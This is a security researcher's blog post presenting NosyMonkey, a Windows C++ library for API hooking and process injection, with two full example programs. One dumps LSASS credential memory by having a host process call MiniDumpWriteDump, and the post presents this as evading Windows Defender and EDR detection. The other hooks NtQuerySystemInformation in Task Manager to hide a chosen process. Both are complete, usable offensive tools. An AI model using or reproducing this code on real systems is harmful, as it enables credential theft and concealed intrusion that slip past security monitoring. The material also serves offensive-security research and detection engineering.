NosyMonkey: API hooking and code injection made easy!

By Alex Popovici

As a researcher, I often run into situations in which I need to make a compiled binary do things that it wouldn’t normally do, or change the way it works in some way. Of course, if one has the source, patching it is always an option, but even then recompiling it and making it work can be troublesome. In these cases, hooking and process injection immediately come to mind.

The ability to modify the result of an API (any API, from the OS or otherwise), modify a parameter before the API is called, or even prevent an API from being called in the first place can help researchers immensely. In general, controlling the execution flow of a process in a stealthy and stable way opens loads of possibilities for which your imagination is the true limit.

If you’ve often encountered any of these problems:

  • I have a program that doesn’t let me specify proxy settings.
  • I need to hide from certain processes the existence of my own process.
  • I want to prevent the Task Manager from killing another process.
  • I need to dump LSASS and Windows Defender is not letting me.
  • I want to close the handle of a file opened by another process.

Then you’ve probably thought about solving them with hooking and/or process injection like this:

  • Hook the function that opens the connection and add your proxy option.
  • Hook NtQuerySystemInformation() or EnumProcesses() and hide your process from the output.
  • Hook OpenProcess() and set it to fail whenever a certain process Id is specified.
  • Execute different actions by injecting them into other processes to reduce your detection signature (Microservicing).
  • Inject a call to CloseHandle() inside of the process that owns the handle of that file and close it.
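To make the OpenProcess() idea concrete, here is a minimal, portable sketch of the hook pattern itself. It is a toy model, not NosyMonkey's implementation: `realOpen`, `g_openEntry`, `hookedOpen` and `installHook` are hypothetical names, the "API" is a plain function returning a fake handle, and the hook is installed by swapping a function pointer (similar in spirit to an import-table hook) rather than by patching code in another process.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical stand-in for an imported API such as OpenProcess():
// it returns a fake non-zero "handle" for any process ID.
using OpenFn = std::uintptr_t (*)(std::uint32_t pid);

std::uintptr_t realOpen(std::uint32_t pid) {
    return 0x1000u + pid;
}

// A one-entry "import table": callers always go through this pointer.
OpenFn g_openEntry = realOpen;

// State used by the hook.
OpenFn g_originalOpen = nullptr;
std::uint32_t g_protectedPid = 0;

// The hook: fail for the protected PID, forward everything else
// to the saved original function.
std::uintptr_t hookedOpen(std::uint32_t pid) {
    if (pid == g_protectedPid) return 0;  // pretend the call failed
    return g_originalOpen(pid);
}

// Install the hook by swapping the table entry and keeping the original.
void installHook(std::uint32_t protectedPid) {
    g_protectedPid = protectedPid;
    if (g_openEntry == hookedOpen) return;  // already installed
    g_originalOpen = g_openEntry;
    g_openEntry = hookedOpen;
}

// What the rest of the program does: call through the table.
std::uintptr_t openProcessLike(std::uint32_t pid) {
    return g_openEntry(pid);
}
```

After `installHook(42)`, a call to `openProcessLike(42)` returns 0 while every other PID still reaches `realOpen()`. The same three ingredients (a replacement function, a way back to the original, and a redirected entry point) are what a real hook needs, only with far more care about where the redirect is written.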

These are by no means new concepts or techniques, but they can be complicated to achieve. Many times, I just resort to creating a DLL and injecting it into the target process; this makes it so that all of the functions and references inside my DLL remain valid. But it’s also cumbersome, in no way stealthy, and it only solves the code injection part of the equation: one still needs to figure out how to place a hook while making sure that the target process doesn’t crash.

So, after reusing the same code for hooking over and over I thought, why not generalize it?

Enter, NosyMonkey: a library to inject code and place hooks that does almost everything for you. No need to write complicated ASM shellcode, or even think about allocating code, hot patching and other dirty business.

NosyMonkey will grab your C-style function, make all of its references (API calls, strings, etc.) valid in your target process and copy it there. Making the references valid is the most important and time-consuming part: when you directly copy the ASM code generated by a compiler to an arbitrary process, all of the non-local references become invalid.

If your code points to a certain memory region for a string (for example), that string won't exist in the virtual memory of your target "injectee" process. But once NosyMonkey makes all of those references valid, you are free to call the function (with whichever parameters you want) or use it as a hook.
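The reference problem can be illustrated with a small, portable sketch. This is only a toy model under loud assumptions: `Blob`, `pointerSlots` and `relocatedCopy` are hypothetical names, the "code" is just a byte vector, and the list of offsets that hold absolute addresses is given up front, whereas a real tool has to discover those references in compiled code. It is not how NosyMonkey is implemented.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Toy "code blob": raw bytes plus the offsets at which the bytes
// contain an absolute 64-bit address (e.g. a pointer to a string).
struct Blob {
    std::vector<std::uint8_t> bytes;
    std::vector<std::size_t> pointerSlots;
};

// Read the 64-bit address stored at the given offset.
std::uint64_t readSlot(const Blob& blob, std::size_t offset) {
    std::uint64_t value = 0;
    std::memcpy(&value, blob.bytes.data() + offset, sizeof value);
    return value;
}

// Store a 64-bit address at the given offset.
void writeSlot(Blob& blob, std::size_t offset, std::uint64_t value) {
    std::memcpy(blob.bytes.data() + offset, &value, sizeof value);
}

// Copy the blob and rewrite every absolute address so that data which
// lived at oldBase in the source is found at newBase in the target.
Blob relocatedCopy(const Blob& source, std::uint64_t oldBase, std::uint64_t newBase) {
    Blob copy = source;
    for (std::size_t offset : copy.pointerSlots) {
        writeSlot(copy, offset, readSlot(copy, offset) - oldBase + newBase);
    }
    return copy;
}
```

For example, a slot holding 0x1020 (data at base 0x1000) becomes 0x7020 once the data has been moved to base 0x7000. A plain byte-for-byte copy would keep pointing at 0x1020, which means nothing in the target process.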

Now, since this is a tl;dr and POC||GTFO world I’m going to show a couple of examples in which I’ll explain the process injection and hooking capabilities of NosyMonkey with less than 100 lines of C++ code and without writing a single ASM instruction. We are going to explore two use cases:

  • Dumping LSASS without being detected by Windows Defender using API MicroServicing.
  • Hiding an arbitrary process from the Task Manager with a hook and using Direct System Calling.

Dumping LSASS

If you have ever hacked into a Windows box, you know the value of dumping the memory of LSASS: it holds credentials and tokens, and can easily give you Domain Admin depending on who has connected to the system recently.

Back in the day, you could just upload Mimikatz and dump the memory there: either it wasn’t detected, or you could make it undetectable by modifying a couple of bytes or using a packer, or you could just kill the AV without ill effects.

Credential dumping with Mimikatz

Nowadays AVs are robust software with behavior analysis, and even if your dumper doesn’t get detected, the act of dumping surely will. But of course, there are legitimate cases in which dumping the memory of a process is necessary, so AVs can’t just denylist all process dumping. There must be a way.

EDR's role in dumping process

Bypassing an EDR's behavior-based detection is often done via API Microservicing: dividing up your API calls and injecting code into host processes, which execute these API calls for you. This greatly reduces your detection signature, so long as your injection technique remains stealthy.

So, how does a dumper work?
A dumper is basically a call to one API inside Dbghelp.dll:

MiniDumpWriteDump Prototype

It takes as parameters:

  • A HANDLE of the process whose memory you want to dump.
  • The process ID of your target.
  • A HANDLE to the file in which the memory will be dumped.
  • The dump type, MiniDumpWithFullMemory (0x2).

The remaining parameters are NULL. The call then generates a dump file that you can take and analyze offline to get any credentials it may hold. So, can we make another process call this API for us? We can with NosyMonkey:

#include "debug.hpp"
#include "../../include/nosymonkey.hpp"

void usage(char *arg1)
{
    string sExec(arg1);
    sExec = sExec.substr(sExec.find_last_of('\\')+1);
    cout << "Dump any process by execution redirection." << endl << endl;
    cout << "By Alex Popovici, part of NosyMonkey's examples (@alex91dotar) github.com/alex91ar" << endl;
    cout << "----------------------------------------------------------------------------------" << endl << endl;
    cout << sExec << " [host process] [target process] [dump file]" << endl << endl;
    cout << "Use cmd.exe as host process. Other single-threaded processes might work as well!" << endl << endl;
    ExitProcess(1);
}

/*
This is a cool example of what we can do with Nosymonkey. lsass.exe's memory has credentials, tokens and other yummy stuff for hackers like me.
The main problem is that EDRs detect whenever someone tries to dump LSASS and stop it (go ahead and try it, open task manager, right click on lsass.exe and dump its memory)

This dumper uses Nosymonkey to load dbgcore.dll and dbghelp.dll into another process, and then calls MiniDumpWriteDump on that process.
This fools EDRs (at least Defender) into allowing the dump.

Remember to run this as an Administrator, otherwise it won't work.
*/

bool loadDlls()
{
    HMODULE dll1 = LoadLibrary("dbgcore.dll");
    HMODULE dll2 = LoadLibrary("dbghelp.dll");
    if(dll1 && dll2) return true;
    else return false;
}

int main(int argc, char **argv)
{
    if(argc != 4) usage(argv[0]);
    setCopyDepth(0); //No local calls, no need for depth.
    HANDLE hFile = CreateFile(argv[3], GENERIC_WRITE, FILE_SHARE_WRITE|FILE_SHARE_READ, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    uintptr_t miniDumpWriteDump = (uintptr_t) GetProcAddress(LoadLibrary("dbghelp.dll"), "MiniDumpWriteDump");
    if(hFile != INVALID_HANDLE_VALUE)
    {
        DWORD dwPid = getProcessId(argv[1]);
        DWORD dwLsass = getProcessId(argv[2]);
        if(dwPid && dwLsass)
        {
            if(givePrivs(dwPid) && givePrivs(GetCurrentProcessId()))
            {
                HANDLE hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, dwLsass);
                uintptr_t remoteHand = dupHandle(dwPid, hLsass);
                uintptr_t remoteFil = dupHandle(dwPid, hFile);
                if(remoteHand && remoteFil)
                {
                    uintptr_t GLEval = 0;
                    uintptr_t retval = copyAndExecWithParams(dwPid, loadDlls, &GLEval, {});
                    cout << (hex) << "LoadDLLs() = 0x" << retval << ". GLE = 0x" << GLEval << endl;
                    if(retval)
                    {
                        retval = execWithParams(dwPid, miniDumpWriteDump, &GLEval, {remoteHand, (uintptr_t) dwLsass, remoteFil, 2, 0, 0, 0});
                        cout << (hex) << "MiniDumpWriteDump() = 0x" << retval << ". GLE = 0x" << GLEval << endl;
                        while(true)
                        {
                            cout << "Closing file handle..." << endl;
                            uintptr_t closeHandle = (uintptr_t) GetProcAddress(LoadLibrary("kernel32.dll"), "CloseHandle");
                            retval = execWithParams(dwPid, closeHandle, &GLEval, {remoteFil});
                            if(retval) break;
                            Sleep(1000);
                        }
                        cout << "Your dump should be in " << argv[3] << endl;
                    }
                }
                debugcry("dupHandle");
            }
            else cout << "Could not get SeDebugPrivilege for processes." << endl;
        }
        else cout << "Processes " << argv[1] << " or " << argv[2] << " not found." << endl;
    }
    debugcry("CreateFile");
    return 0;
}

See? 79 lines including the usage screen and comments, and we are:

  • Creating our dump file with CreateFileA().
  • Getting the address of MiniDumpWriteDump() with GetProcAddress() (remember that ASLR is global per OS restart, so the address we resolve locally should match in the dumper process).
  • Finding the PIDs of our surrogate dumper and the dumpee (LSASS in this case) with NosyMonkey’s getProcessId().
  • Giving SeDebugPrivilege to our process and the dumper process with NosyMonkey’s givePrivs().
  • Opening a HANDLE to LSASS with OpenProcess().
  • Duplicating the dump file’s and the LSASS process’s handles so they are valid in the dumper process, using NosyMonkey’s dupHandle().
  • Loading DbgHelp.dll and DbgCore.dll into the dumper by injecting a function with NosyMonkey’s copyAndExecWithParams(). Note that the function uses strings, which are copied and have their references recalculated.
  • Calling MiniDumpWriteDump() with NosyMonkey’s execWithParams(), passing the parameters necessary for our dumper process to dump LSASS.
  • Finally, closing the file HANDLE so it doesn’t stay open in the dumper process.
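Notice that the example passes every argument as a `uintptr_t`, whether it is a HANDLE, a PID or a flag. A minimal local analogue of that convention can be sketched as follows. This is an assumption-laden illustration, not NosyMonkey's code: `callWithParams`, `add3` and `answer` are hypothetical names, the call happens in the current process rather than a remote one, and it relies on the target really having a signature made only of machine-word parameters.

```cpp
#include <cassert>
#include <cstdint>
#include <stdexcept>
#include <vector>

using Word = std::uintptr_t;  // one machine word per argument

// Call the function at address `fn`, passing each parameter as a word.
// Only up to three parameters are handled to keep the sketch short.
Word callWithParams(Word fn, const std::vector<Word>& p) {
    switch (p.size()) {
        case 0: return reinterpret_cast<Word (*)()>(fn)();
        case 1: return reinterpret_cast<Word (*)(Word)>(fn)(p[0]);
        case 2: return reinterpret_cast<Word (*)(Word, Word)>(fn)(p[0], p[1]);
        case 3: return reinterpret_cast<Word (*)(Word, Word, Word)>(fn)(p[0], p[1], p[2]);
        default: throw std::invalid_argument("too many parameters for this sketch");
    }
}

// Two sample targets whose parameters are all machine words.
Word add3(Word a, Word b, Word c) { return a + b + c; }
Word answer() { return 42; }
```

Here `callWithParams(reinterpret_cast<Word>(&add3), {1, 2, 3})` invokes `add3(1, 2, 3)`. The remote version has the extra problem that pointers and handles in the list must already be valid in the target process, which is why the example duplicates its handles first.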

And it works too (without triggering Windows Defender):

Dumping LSASS with NosyMonkey

Hiding a process from the Task Manager

There are many ways of listing the processes running on a Windows box using WinAPI; most commonly you can use EnumProcesses() or CreateToolhelp32Snapshot(). But the Task Manager does it by calling NtQuerySystemInformation() directly. This is an “undocumented” API from ntdll.dll (nowadays most “undocumented” APIs are unofficially documented) which performs a system call.

Task Manager does this because making the system call directly, instead of going through a higher-level wrapper API, avoids unnecessary boilerplate instructions and makes the process more efficient. The problem is that going through the gargantuan structure that NtQuerySystemInformation() returns is a bit of a hassle, especially if one is trying to remove an item from it.

One neat thing about NosyMonkey, though, is that for APIs that do a context switch, the hook reaches the original functionality through a direct system call, so you can leave the patch in place without problems. This is great for synchronization. I know I promised less than 100 lines, and I need to cheat a bit here: the upper part of this example includes structure definitions for the API call, which are not defined in Microsoft’s headers (because they are, again, “undocumented”). But if you remove those, we are still under 100 lines:

#include "debug.hpp"
#include "../../include/nosymonkey.hpp"
#include "ntdefs.hpp"

void usage(char *arg1)
{
    string sExec(arg1);
    sExec = sExec.substr(sExec.find_last_of('\\')+1);
    cout << "Hide a process by hooking NtQuerySystemInformation." << endl << endl;
    cout << "By Alex Popovici, part of NosyMonkey's examples (@alex91dotar) github.com/alex91ar" << endl;
    cout << "----------------------------------------------------------------------------------" << endl << endl;
    cout << sExec << " [target process] [process to hide]" << endl << endl;
    cout << "Try taskmgr.exe as your target process."  << endl << endl;
    ExitProcess(1);
}
char pszProcessHidden[256];

/*
This is a good example of how to /avoid/ using local functions (i.e. those that are statically linked to your main module) and instead use equivalents
which can be referenced by Nosymonkey on your target process.
I wrote this before I implemented support for local functions, but the idea remains the same:

pszProcessHidden is a global variable, which is copied into the target executable by Nosymonkey.

We place the hook on the function NtQuerySystemInformation from ntdll.dll. This function is an "NT" function
which means that it does a context switch (via a system call), thus we can use direct system calling to restore the flow of execution.

This function is called by Taskmgr.exe to get the list of executables, we then traverse the list, compare the process names and hide
the one that we want.

Note that:
- originalCall() is used as a placeholder to call the original version of NtQuerySystemInformation, this is a dummy function that will be replaced.
- MultiByteToWideChar() is used to convert pszProcessHidden to UNICODE, as NtQuerySystemInformation returns wide-char strings.
- LocalAlloc()/LocalFree() are used instead of the new operator or malloc(), which are both locally referenced.
- CompareStringW() is used instead of wcscmp() for the same reason.

Also, since we're not using local function calls, we can just call setCopyDepth(0), to reduce the final shellcode size and skip that part of the process.

*/

uintptr_t NtQuerySystemInformationHook(uintptr_t SystemInformationClass,uintptr_t SystemInformation,uintptr_t SystemInformationLength,uintptr_t ReturnLength)
{
    uintptr_t ntOut = originalCall(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); //Call the original NtQuerySystemInformation via direct system call.
    if(ntOut == 0 && SystemInformationClass == SystemProcessInformation)
    {
        //The operator "New" points to a statically linked function so, can't use it. LocalAlloc works though.
        wchar_t *pwszTemp = (wchar_t *) LocalAlloc(LMEM_ZEROINIT, sizeof(wchar_t)*256);
        //Global variables are referenced via relative PTR instructions.
        MultiByteToWideChar(CP_UTF8, MB_PRECOMPOSED, pszProcessHidden, -1, pwszTemp, 256); //The last argument is the buffer size in wide characters, not bytes.
        PSYSTEM_PROCESSES infoP = (PSYSTEM_PROCESSES)SystemInformation;
        PSYSTEM_PROCESSES lastInfoP = NULL;
        while(infoP) //The logic looks wonky but it works.
        {
            lastInfoP = infoP;
            infoP = (PSYSTEM_PROCESSES)(((LPBYTE)infoP) + infoP->NextEntryDelta); //The first one is always "System" so we can skip it.
            //Can't use wcscmp because it looks like it's statically built.
            //CompareStringW is from kernel32.dll so it should be fine to call.
            if(CompareStringW(LOCALE_USER_DEFAULT, LINGUISTIC_IGNORECASE, infoP->ProcessName.Buffer, -1, pwszTemp, -1) == CSTR_EQUAL)
            {
                if(infoP->NextEntryDelta)
                {
                    //We need to tell the list that the next item is referenced after the one we want to hide.
                    ULONG newEntryDelta = lastInfoP->NextEntryDelta + infoP->NextEntryDelta;
                    //We go back to the previous one.
                    infoP = (PSYSTEM_PROCESSES)(((LPBYTE)infoP) - lastInfoP->NextEntryDelta);
                    lastInfoP->NextEntryDelta = newEntryDelta;
                }
                else lastInfoP->NextEntryDelta = 0;
            }
            if (!infoP->NextEntryDelta) break;
        }
        LocalFree(pwszTemp);
    }
    return ntOut;
}

int main(int argc, char **argv)
{
    if(argc != 3) usage(argv[0]);
    setCopyDepth(0);
    strncpy(pszProcessHidden, argv[2], sizeof(pszProcessHidden) - 1); //Bounded copy; the zero-initialized global stays NUL-terminated.
    DWORD dwPid = getProcessId(argv[1]);
    if(dwPid)
    {
        cout << "Hiding process " << pszProcessHidden << endl;
        if(hookAPIDirectSyscall(dwPid, (LPVOID)NtQuerySystemInformationHook, "NtQuerySystemInformation"))
        {
            return 0;
        }
    }
    return 1;
}

The NtQuerySystemInformationHook() function of the example is the one that gets executed instead of the original function. A few things are noteworthy here:

  • The originalCall() function is a variadic template function that takes any number of parameters. It’s just a hack so we can easily call the original version of the API, which is necessary to perform the hook. During processing, it’s identified and replaced.
  • I’m using the WinAPI versions of functions, because they are saved in the IAT of the process instead of being locally referenced functions (see “limitations” for more info). To this end:
    • The new/delete operators are replaced with LocalAlloc/LocalFree.
    • MultiByteToWideChar is used to convert ANSI strings to Unicode strings, since NtQuerySystemInformation() returns Unicode strings, and we need to compare them to identify the process we want to hide.
    • CompareStringW is used to compare Unicode strings, for the same reason.

The main code is very short because we just need to call NosyMonkey’s hookAPIDirectSyscall() to place our hook. And that’s it!
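The unlinking logic inside the hook is easier to follow on a simplified model. The sketch below is a portable illustration under stated assumptions: `Record`, `makeList`, `hideRecord` and `listNames` are hypothetical names, the records are fixed-size with narrow-character names, and the comparison is case-sensitive, whereas the real structure has variable-size entries, wide-character names and the hook compares case-insensitively. What it keeps is the key idea: entries are chained by a byte offset to the next entry, so hiding one means making its predecessor skip over it.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Simplified entry: a byte offset to the next entry (0 marks the last one)
// followed by a fixed-size name.
struct Record {
    std::uint32_t nextEntryDelta;
    char name[28];
};

// Build a contiguous list of records from a list of names.
std::vector<Record> makeList(const std::vector<std::string>& names) {
    std::vector<Record> recs(names.size());  // value-initialized to zero
    for (std::size_t i = 0; i < names.size(); ++i) {
        recs[i].nextEntryDelta = (i + 1 < names.size()) ? sizeof(Record) : 0;
        std::strncpy(recs[i].name, names[i].c_str(), sizeof(recs[i].name) - 1);
    }
    return recs;
}

// Follow the delta to the next record, or return nullptr at the end.
Record* nextRecord(Record* r) {
    if (r->nextEntryDelta == 0) return nullptr;
    return reinterpret_cast<Record*>(reinterpret_cast<std::uint8_t*>(r) + r->nextEntryDelta);
}

// Unlink every record called `hidden`, except the head, which is never removed.
void hideRecord(Record* head, const std::string& hidden) {
    if (!head) return;
    Record* prev = head;
    Record* cur = nextRecord(head);
    while (cur) {
        if (hidden == cur->name) {
            // Make the predecessor jump over cur, or end the list if cur was last.
            prev->nextEntryDelta = cur->nextEntryDelta ? prev->nextEntryDelta + cur->nextEntryDelta : 0;
        } else {
            prev = cur;
        }
        cur = nextRecord(cur);  // cur's own delta is left untouched
    }
}

// Collect the names that are still reachable from the head.
std::vector<std::string> listNames(Record* head) {
    std::vector<std::string> out;
    for (Record* r = head; r; r = nextRecord(r)) out.push_back(r->name);
    return out;
}
```

With a list of "System", "code.exe" and "cmd.exe", calling `hideRecord(list.data(), "code.exe")` leaves only "System" and "cmd.exe" reachable. The hidden record's bytes are still in the buffer; any caller that walks the list by following the deltas simply never visits them.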

Calling hideprocess to hide "code.exe"

Code.exe hidden

Limitations

There are a few limitations: some I will address in the future, some I’ll do my best to address, and some I don’t think I can do much about:

  • For non-context-switching APIs, NosyMonkey’s detourApiHook() copies the DLL and loads the copy again, so that the hook has a way of reaching the original code it replaced. In the future I’m going to use MemoryModule to reflectively load the second copy.
  • For the above-mentioned reason, non-ASLR DLLs cannot be hooked by NosyMonkey because the second version would be loaded with the same Base Address.
  • I’m working on Unit Tests; I’ll add more in the future.
  • You need to link with -ladvapi32 and -lpsapi.
  • Local calls (e.g., calling new/delete operators, strcmp or other statically linked functions) may work. NosyMonkey tries to identify the amount of code it must copy, but it’s a tough problem to solve. You can tune this with NosyMonkey’s setCopyDepth() and setCopyCodeSize() functions, but identifying where a branching function ends goes into halting problem territory. If you have any suggestions on how to improve these heuristics, throw them my way!

Closing Thoughts

Thank you for reading!
If you want to contact me, you can do so via my socials (see below).

The source code for NosyMonkey is here: https://github.com/anvilsecure/nosymonkey

I'm open to feedback and ways to improve the library, so feel free to open issues! If you find any bugs, please include the code in which you use NosyMonkey. That way I'll be able to pinpoint the issue, fix the bug or troubleshoot the problem.

About the Author

Alex Popovici is currently a Senior Security Engineer at Anvil Secure. Although he mostly works with web applications, holding different positions across his 10 years of experience has given him a diverse skillset.

Whenever a new exploitation challenge arises, whether the target is Windows or *nix, Kernel or Userland or Web or Binary, Alex dives into it with determination and passion.

When he is offline, Alex likes to go hiking in nature to disconnect and recover his Hit Points.
